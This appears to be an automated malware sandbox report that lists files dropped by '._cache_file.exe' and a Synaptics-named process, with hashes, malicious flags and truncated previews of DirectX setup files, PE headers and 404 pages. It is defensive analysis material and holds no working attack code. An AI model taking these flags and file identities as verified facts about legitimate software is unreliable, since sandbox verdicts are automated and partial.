                                                                                              Preview:[Version]..Signature=$Chicago$..DisplayName=%SetupTitle%..MinFileSize=2000....[DirectX]..SectionType=Group..Priority=100..DisplayName=%DirectX%....[DirectX_Win9X]..DisplayName=%DirectX_Win9X%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4608,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x.cab",3..URL2="dinput_w9x_81.cab",3..URL3="dplay_w9x.cab",3..URL4="dshow_w9x.cab",3..URL5="dshow_w9x_81.cab",3..URL6="graphics_w9x.cab",3..URL7="graphics_w9x_81.cab",3..URL8="ks_w9x.cab",3..URL9="vb_w9x.cab",3..URL10="bda_w9x.cab",3..URL11="setup_w9x.cab",3..Version="9,29,1962,0"....[DirectX_Win98_ENG]..DisplayName=%DirectX_Win98%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4348,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x_eng.cab",3..URL2="dinput_w9x_81_eng.cab",3..URL3="dplay_w9x_eng.cab",3..URL4="dshow_w9x_eng.cab",3..URL5="dxdiag_w9x_eng.cab",3..URL6="graphics_w9x_eng.cab"

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dll

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):89944
                                                                                              Entropy (8bit):6.418506334480987
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gtBqvGpPmOEll4RWxiF9G3ZnVdqkFKJuTJbHo0Xm+jN3i97ZTj4FWMD+ZJqsHPCL:gtAvG5mOEll4Roi2pVVFKJuTVtXVpS9y
                                                                                              MD5:0A23038EA472FFC938366EF4099D6635
                                                                                              SHA1:6499D741776DC4A446C22EA11085842155B34176
                                                                                              SHA-256:8F2C455C9271290DCDE2F68589CF825F9134BEECB7E8B7E2ECBCABEAB792280A
                                                                                              SHA-512:DCC1C2EA86FD3A7870CD0369FA42F63D493895C546DCDD492EE19079A0D0696D689BBFE7B686D4FA549841896A54E673FC4581B80783D7AA255DFAD765B9DC88
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NOd..............V..........u...eX......eX......eX......eX..`...eX......eX......Rich............PE..L....A.L...........!.........N.......p.......0......................................2.....@..........................$..y............p..h............H..X.......`... ................................=..@............................................text............................... ..`.data...<0...0......................@....rsrc...h....p.......,..............@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dll

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1801048
                                                                                              Entropy (8bit):6.400511251324513
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:RjnIXtNeOOOOOOOOOOOOOOOOOiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWI:5IjmY
                                                                                              MD5:7672509436485121135C2A0E30B9E9FF
                                                                                              SHA1:F557022A9F42FE1303078093E389F21FB693C959
                                                                                              SHA-256:D7EA3CF1B9B639010005E503877026597A743D1068AE6A453CE77CC202796FEA
                                                                                              SHA-512:E46FF68C4A532017F8AB15B1E46565508F6285B72C7A1CBE964ED5E75320C8E14587D01FEE61B3966F43636BFE74CEBD21F7665B4A726281E771CF9230E69863
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.,.{.BZ{.BZ{.BZr..Zh.BZ{.CZ.BZ...Zi.BZ...Zz.BZ...Z..BZ...ZQ.BZ...Zz.BZ...Zz.BZRich{.BZ........................PE..L....A.L...........!.....`...................p............................................@..........................m......d^......................d..X....p... ......................................@............................................text....^.......`.................. ..`.data....4...p.......d..............@....rsrc...............v..............@..@.reloc...-...p.......6..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.cif

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):66865
                                                                                              Entropy (8bit):5.567626982635727
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:Wn+OeDyG6lG9CVGQM6UP8XUUkw8KlNxLkPkjdARflPp0VZRTBM9oZPFASJu71N1F:V
                                                                                              MD5:B36D3F105D18E55534AD605CBF061A92
                                                                                              SHA1:788EF2DE1DEA6C8FE1D23A2E1007542F7321ED79
                                                                                              SHA-256:C6C5E877E92D387E977C135765075B7610DF2500E21C16E106A225216E6442AE
                                                                                              SHA-512:35AE00DA025FD578205337A018B35176095A876CD3C3CF67A3E8A8E69CD750A4CCC34CE240F11FAE3418E5E93CAF5082C987F0C63F9D953ED7CB8D9271E03B62
                                                                                              Malicious:false
                                                                                              Preview:..[Version]..Signature=$Chicago$..DisplayName=%SetupTitle%..MinFileSize=2000....[DirectX]..SectionType=Group..Priority=100..DisplayName=%DirectX%....[DXUpdate_Feb2005_x86]..DisplayName=%Feb2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=990,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="Feb2005_d3dx9_24_x86.cab",3..Version=4,09,00,0904....[DXUpdate_Feb2005_x64]..DisplayName=%Feb2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=1220,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="Feb2005_d3dx9_24_x64.cab",3..Version=4,09,00,0904....[DXUpdate_Apr2005_x86]..DisplayName=%Apr2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=1055,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="Apr2005_d3dx9_25_x86.cab",3..Version=4,09,00,0904....[DXUpdate_Apr2005_x64]..DisplayName=%Apr2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=1317

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dll

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):177152
                                                                                              Entropy (8bit):6.549767948531931
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:KU6LKKnw8i/9S7BLGKm/nuFV3uNgosUBxr+2y97CqGIpHtWMeJnQRLj+bTHyKaY:Iw8aIMrfuFVeNgosUBxra4rIZsqq
                                                                                              MD5:7ED554B08E5B69578F9DE012822C39C9
                                                                                              SHA1:036D04513E134786B4758DEF5AFF83D19BF50C6E
                                                                                              SHA-256:FB4F297E295C802B1377C6684734B7249D55743DFB7C14807BEF59A1B5DB63A2
                                                                                              SHA-512:7AF5F9C4A3AD5C120BCDD681B958808ADA4D885D21AEB4A009A36A674AD3ECE9B51837212A982DB6142A6B5580E5B68D46971B802456701391CE40785AE6EBD9
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: dxwebsetup.exe, Detection: malicious, Browse
                                                                                              • Filename: , Detection: malicious, Browse
                                                                                              • Filename: CuratorStandardSetup.exe, Detection: malicious, Browse
                                                                                              • Filename: CuratorStandardSetup.exe, Detection: malicious, Browse
                                                                                              • Filename: , Detection: malicious, Browse
                                                                                              • Filename: Palworld.zip, Detection: malicious, Browse
                                                                                              • Filename: Palworld.exe, Detection: malicious, Browse
                                                                                              • Filename: , Detection: malicious, Browse
                                                                                              • Filename: , Detection: malicious, Browse
                                                                                              • Filename: 5b1cxnTnnS.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M.CM...M...MJ..M...M...M...M...M...M...M..KM...M..zM...M..{M...M..JM...M..MM...MRich...M................PE..L......M...........!.....j...n............................................................@.........................pw..V....j..........8.......................X...p...................................@...............8............................text....h.......j.................. ..`.data....:...........n..............@....rsrc...8...........................@..@.reloc..0&.......(..................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.inf

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):12848
                                                                                              Entropy (8bit):5.071095411173453
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:eXTiDxtV0xxmBxbD6Ys7s6xHOJYwYdDxAp8xXZyUxIJM:eXiM
                                                                                              MD5:E6A74342F328AFA559D5B0544E113571
                                                                                              SHA1:A08B053DFD061391942D359C70F9DD406A968B7D
                                                                                              SHA-256:93F5589499EE4EE2812D73C0D8FEACBBCFE8C47B6D98572486BC0EFF3C5906CA
                                                                                              SHA-512:1E35E5BDFF1D551DA6C1220A1A228C657A56A70DEDF5BE2D9273FC540F9C9F0BB73469595309EA1FF561BE7480EE92D16F7ACBBD597136F4FC5F9B8B65ECDFAD
                                                                                              Malicious:false
                                                                                              Preview:..; ---- Common sections ----..[Version]..Signature = "$CHICAGO$"..AdvancedINF = 2.0..Provider = %MSFT%..SetupClass = BASE....[Strings]..MSFT = "Microsoft"....[MDXDLLs]..Microsoft.DirectX.AudioVideoPlayback.dll..Microsoft.DirectX.Diagnostics.dll..Microsoft.DirectX.Direct3D.dll..Microsoft.DirectX.Direct3DX.dll..Microsoft.DirectX.DirectDraw.dll..Microsoft.DirectX.DirectInput.dll..Microsoft.DirectX.DirectPlay.dll..Microsoft.DirectX.DirectSound.dll..Microsoft.DirectX.dll......; ---- Windows 98 ----..[4.09.00.0904.00-4.09.00.0904.00_Win98_Feb2005_d3dx9_24_x86.cab]..NumberOfFiles=4..Size=2178 ;approximately total file size (Size * 1024 bytes)..CopyCount=1..d3dx9_24_w9x.inf....[4.09.00.0904.00-4.09.00.0904.00_Win98_Feb2005_MDX_x86.MSI]..NumberOfFiles=1..Size=1788 ;approximately total file size (Size * 1024 bytes)..CopyCount=1..Dependencies=feb2005_d3dx9_24_x86.cab..Feb2005_MDX_x86.MSI......; ---- Windows ME ----..[4.09.00.0904.00-4.09.00.0904.00_WinME_Feb2005_d3dx9_24_x86.cab]..N

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.cif

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):57739
                                                                                              Entropy (8bit):5.688682745352895
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:eNITdgil00BU0twUZB7otN4PTH+y491I7/su6U3mI9rITogZD0+pYnrIvdgsl0KW:eEBDSYj4kiJOnitAmfdwe5q24jIxwzKI
                                                                                              MD5:0DAFB23D5BD4B80C79A0F82DC2DE34D0
                                                                                              SHA1:8159FD03F133C9CD8CFB194971A5250B9ECDA0A8
                                                                                              SHA-256:3EF4C33102886EAE3C812B948FF3FBF70BB03DD91E772B852DA3F9AAF75BDB29
                                                                                              SHA-512:78E7FB35CAB3D0ACE4E4FEF2868CC5F31B2254C267402779893B3F3FCE90B8D784328AC19EF0D6BD37D975D557917BE19D7A8A32A94FF8606AFD36883EC1C9BB
                                                                                              Malicious:false
                                                                                              Preview:[Version]..Signature=$Chicago$..DisplayName=%SetupTitle%..MinFileSize=2000....[DirectX]..SectionType=Group..Priority=100..DisplayName=%DirectX%....[DirectX_Win9X]..DisplayName=%DirectX_Win9X%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4608,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x.cab",3..URL2="dinput_w9x_81.cab",3..URL3="dplay_w9x.cab",3..URL4="dshow_w9x.cab",3..URL5="dshow_w9x_81.cab",3..URL6="graphics_w9x.cab",3..URL7="graphics_w9x_81.cab",3..URL8="ks_w9x.cab",3..URL9="vb_w9x.cab",3..URL10="bda_w9x.cab",3..URL11="setup_w9x.cab",3..Version="9,29,1962,0"....[DirectX_Win98_ENG]..DisplayName=%DirectX_Win98%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4348,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x_eng.cab",3..URL2="dinput_w9x_81_eng.cab",3..URL3="dplay_w9x_eng.cab",3..URL4="dshow_w9x_eng.cab",3..URL5="dxdiag_w9x_eng.cab",3..URL6="graphics_w9x_eng.cab"

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):498688
                                                                                              Entropy (8bit):5.921914360240825
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:yiqLKTd9mKfwm7rfrK7iPG6rG3C7hO4YTYHVzoPD+sUn7RG+hPXzNbgC1Adm2exP:6kvS4c3C7iMw70
                                                                                              MD5:EAA6B5EE297982A6A396354814006761
                                                                                              SHA1:780BF9A61C080A335E8712C5544FCBF9C7BDCD72
                                                                                              SHA-256:D298FD82A39B2385A742BA1992466E081BEA0F49E19ECE6B2C87C7C262E1FCEE
                                                                                              SHA-512:EBDC887B6B334B7560F85AB2EBD29DC1F3A2DEDAC7F70042594F2A9BC128B6FCA0A0E7704318ED69B7ACF097E962533B3CE07713EF80E8ACFE09374C13302999
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`7..$V..$V..$V..K L.5V..-.A.5V..$V..V..K x.OV..K y..V..K H.%V..K O.%V..Rich$V..................PE..L....A.L.................v..."....................................................../.....@...... ..........................Lx.......................................................................^..@...............`............................text....u.......v.................. ..`.data....1...........z..............@....rsrc...............................@..@.reloc........... ...|..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.inf

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:modified
                                                                                              Size (bytes):477
                                                                                              Entropy (8bit):5.237059564403252
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:AEAv+BIHfXhPJycXlnMlr4TFagtVFIglFdW8HEwF2T2GHEdqT2azM2GvjokVj2aE:BBIpPJhXlnMYFz2gkDvqtwqa9YS7r
                                                                                              MD5:AD8982EAA02C7AD4D7CDCBC248CAA941
                                                                                              SHA1:4CCD8E038D73A5361D754C7598ED238FC040D16B
                                                                                              SHA-256:D63C35E9B43EB0F28FFC28F61C9C9A306DA9C9DE3386770A7EB19FAA44DBFC00
                                                                                              SHA-512:5C805D78BAFFF06C36B5DF6286709DDF2D36808280F92E62DC4C285EDD9176195A764D5CF0BB000DA53CA8BBF66DDD61D852E4259E3113F6529E2D7BDBDD6E28
                                                                                              Malicious:false
                                                                                              Preview:[Version]..Signature="$CHICAGO$"..AdvancedINF=2.0..Provider = %MSFT%....[SourceDisksNames]..1 = %DiskName%,DXWSETUP.EXE,0....[SourceDisksFiles]..dsetup.dll=1..dsetup32.dll=1....[DestinationDirs]..DSetupDLL=11,directx\websetup....[DirectX_WinNT]..CopyFiles=DSetupDLL....[DirectX_Win9X]..CopyFiles=DSetupDLL....[CleanUp]..DelFiles=DSetupDLL....[DSetupDLL]..dsetup.dll,,,32..dsetup32.dll,,,32....[Strings]..MSFT = "Microsoft"..DiskName = "DXWSETUP"....

                                                                                              C:\Users\user\AppData\Local\Temp\Lb7i88Z.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.261347284387758
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0RyJaQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+DJT+pAZewRDK4mW
                                                                                              MD5:36D804F33E516B9F405109C74BF662E8
                                                                                              SHA1:2095C0D21E0FCD6B00D6AD9945A8293B52959630
                                                                                              SHA-256:491ED7E9842E36D85F01BAE5426095DBEF5A03B5B44EF0C663CC767A1E65BFFC
                                                                                              SHA-512:3766E8659B2C7455A136A898A4066611B7D7B7F86C8AF305014421BE6034FCFFE733342C96CEEF7330B64D3497927E919AC557CCBBFECEB5D9CD9ED6895DA659
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fzjK6wvs9fOOrXkBt9e9bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\M5Rcco5.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.257624648156662
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0gDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+nD+pAZewRDK4mW
                                                                                              MD5:EE12EBDFEEF88460F2D2B2DCA7C382A4
                                                                                              SHA1:753123EAA537803F136DC3C0C73EF2D80DA8B696
                                                                                              SHA-256:B37CA16B38AD3AE38436F0D9774E31BBBE93E2378E0211F4DFBFEEEF2F8EFDFB
                                                                                              SHA-512:55398264C37593F5D583B030DE75D4DFC0FEF06DDAC0E638FC0F49523645D9D16899473EDE05EA6373870006FA9CB25F65C4B18625B73A4F50BE0D18F27AEB1C
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0LExrQM6Kvfp0-Wy5-827w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\NSKNuVq.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.254949485509859
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0hfSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                              MD5:BE74F858DDE869B8EA6A0BC60282B687
                                                                                              SHA1:DA68640F558C00FFD893806CA922B0F4FD5EDA0E
                                                                                              SHA-256:465EC5864437AE277996A40D85F34C41D2F0341A55286310C3F74164BCC24D50
                                                                                              SHA-512:25AA9CCDAC7BE477FEFBAD4436F51E40E4F2208DD734F3154B15FB0DC5BBFB7C9C41E461494C7C420DA1A2A44CEF745D6E16FB07AA3CF7D271AF4194FDA085BA
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9GOc4soP53awnN4LN6Fw2w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\NuwTiLF.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.2681668092019605
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0kdm1ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+NAZ+pAZewRDK4mW
                                                                                              MD5:FAC783362063F8C6D371EBADDF25E0D0
                                                                                              SHA1:24E54CB6B58E8597D6AE2309F0DCB1CD327723C8
                                                                                              SHA-256:96C3CD7CDC29D38B5E6729A455CD72B6643356DF103CAB993ECDA66FCF462C88
                                                                                              SHA-512:6C979FE668E3E1CE56BE625B65A99535D38C9786952722FD3ED7DC1B81405B6E3BB733871F9A2EE57799B7F94BB21AEAC61BF4F0E18D5216B30941B4B2CD6615
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wm5bW8MXUT0Yc684XtCqmA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\QLcJ4Cw.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.265174828212079
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0hOSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                              MD5:6B8F0230A9C88AE98A98B236542FE137
                                                                                              SHA1:BC06B687B3DE72963AF28D905AEF5F2460928F9B
                                                                                              SHA-256:E776AC19F05581D8505BEF0D3A98DCB7231821126129020505E28155DEAF1317
                                                                                              SHA-512:52BF9B2AD11A1420B6A4EC353B8F9BAD9A8ADD19A7F7D299F089C22EE7FD1AE7678286862AC4C17E444056D8F88E6334E4C754B2C304DBE3C8772F34BE9CD004
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iHU1T2RuOZFzz4QbioFIkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\Rn1eHxk.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.255002510190719
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0N5nzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+az+pAZewRDK4mW
                                                                                              MD5:21003A750429A61C39F87F4F58A93DDB
                                                                                              SHA1:263FD9155CAA26F5E64882777A6628C7D97C831D
                                                                                              SHA-256:07F188CE265811479C4AA20C741B538D6FB6E39FC447F1A039E3F2F8F36EC3D8
                                                                                              SHA-512:D50FC3BC34773C01875113E81D1DC63EAA4BE4F786A63C72AD30072B52B30D993BF2BCB376A256229FB296FBC98DBF94B220486DB6BE47A9E49E76CE5DC1427C
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="boMQ2bK9rN4CB7oTsGhx1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\RxB2ze6.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.27034571911857
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0igSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Ng+pAZewRDK4mW
                                                                                              MD5:4A663BBB430A78B954F54D2C33C14C7E
                                                                                              SHA1:D2DEBEA1366396D69BBC47AB4C1A8109596FCC76
                                                                                              SHA-256:325A5AD876CD52CE19EA1016BDDCAD0E57120A1C53E1DDDA2486601D4513DF48
                                                                                              SHA-512:DD24438D2F029A32307B85975CAACBDD2EF091EA2B89C6D72E943DD251428A147DE433BEB0EECCB9D534DDB28539636592CC364D3DA8F07FFBA9122995C76295
                                                                                              Malicious:false
